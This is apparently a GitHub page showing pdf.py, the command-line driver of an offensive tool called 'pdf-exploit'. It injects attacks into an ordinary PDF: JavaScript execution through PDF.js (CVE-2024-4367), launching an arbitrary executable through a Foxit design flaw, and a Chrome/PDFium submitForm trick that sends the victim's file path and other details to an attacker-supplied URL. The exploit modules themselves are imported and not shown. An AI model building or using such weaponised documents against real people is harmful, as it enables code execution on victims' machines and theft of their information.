-
Notifications
You must be signed in to change notification settings - Fork 37
/
Copy pathpdf.py
executable file
·58 lines (43 loc) · 1.83 KB
/
pdf.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#! ./.venv/bin/python3
import argparse
from core import Pdf
from exploit import pdfjs, foxit, chrome
def run():
parser = argparse.ArgumentParser(prog='pdf-exploit')
parser.add_argument("-f", help="the harmless pdf path", required=True)
parser.add_argument("-p", help="password", required=False)
parser.add_argument("-o", help="the new pdf file", required=True)
pdfjs_group = parser.add_argument_group(
title="pdfjs", description="CVE-2024-4367")
pdfjs_group.add_argument(
"-pdfjs", help="javascript to be executed, example: alert(3)")
foxit_group = parser.add_argument_group(
title="foxit", description="foxit pdf 'flawed design' explotation")
foxit_group.add_argument("-foxit-exec", dest="foxit_exec")
foxit_group.add_argument("-foxit-args", dest="foxit_args")
chrome_group = parser.add_argument_group(
title="chrome", description="use submitForm of pdfium to steal pdf file path and other information")
chrome_group.add_argument(
"-submitForm", help="The url to which the pdf path will be reported, example: http://127.0.0.1:9999")
args = parser.parse_args()
pdf = Pdf(args.f, args.p)
if args.pdfjs:
print(f"[+] use the PDF.JS exploit: {args.pdfjs}")
exp = pdfjs.ExploitPdfjs("./font.binary", args.pdfjs)
exp.exploit(pdf)
print("")
if args.foxit_exec:
print(
f"[+] use the foxit exploit: {args.foxit_exec} {args.foxit_args}")
exp = foxit.Foxit(args.foxit_exec, args.foxit_args)
exp.exploit(pdf)
print("")
if args.submitForm:
print(f"[+] use the chrome exploit: {args.submitForm}")
exp = chrome.ChromePdfExploit(args.submitForm)
exp.exploit(pdf)
print("")
print(f"[+] store to {args.o}")
pdf.store(args.o)
if __name__ == "__main__":
run()